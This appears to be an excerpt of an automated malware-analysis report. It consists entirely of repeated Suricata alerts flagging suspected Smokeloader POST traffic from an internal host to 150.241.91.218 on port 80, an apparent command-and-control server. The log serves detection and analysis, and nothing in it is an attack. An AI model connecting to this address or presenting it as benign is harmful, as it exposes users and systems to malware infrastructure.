        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49809 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49776 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49775 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49804 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49789 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49824 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49784 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49910 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49849 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49817 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49829 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49890 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49838 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49777 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49805 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49796 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49821 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49830 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49771 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49793 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49790 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49927 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49871 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49819 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49894 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49850 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49878 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49832 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49780 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49834 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49810 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49791 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49797 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49794 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49873 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49953 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49841 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49897 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49864 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49879 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49839 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49807 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49847 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49806 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49792 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49848 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49869 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49802 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49827 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49969 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49884 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49902 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49865 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49808 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49840 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49880 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49896 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49814 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49851 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49855 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49899 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49822 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49923 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49903 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49991 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49812 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49842 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49882 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49856 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49900 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49818 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49872 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49863 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49861 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49831 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49911 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50004 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49955 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49907 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49905 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49876 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49901 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49853 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49867 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49860 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49846 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49887 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49875 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50033 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49909 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49888 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49833 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49937 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49916 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49930 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49886 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49854 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49857 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49892 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49962 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49877 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49874 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50051 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49970 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49813 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49852 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49891 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49922 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49938 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49898 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49885 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49859 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49935 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50062 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49932 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49984 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49889 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49997 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49906 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49904 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49908 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49815 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49925 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49918 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49951 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49895 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49944 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50069 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49939 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49915 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50010 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49921 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50009 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49912 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49825 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49940 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49948 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49929 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49942 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49961 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49954 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49950 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50071 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49943 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50026 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49980 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50027 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49972 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49862 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49913 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49956 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49947 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49963 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49979 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49945 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50121 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50060 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49917 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49959 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50003 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49866 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49919 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49988 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49949 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49995 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49958 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49964 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50139 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49952 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50015 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50065 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49974 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49926 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50029 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49920 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50021 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49999 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49868 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49966 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50030 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49965 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50142 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49994 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50064 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:50116 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49934 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49982 -> 150.241.91.218:80
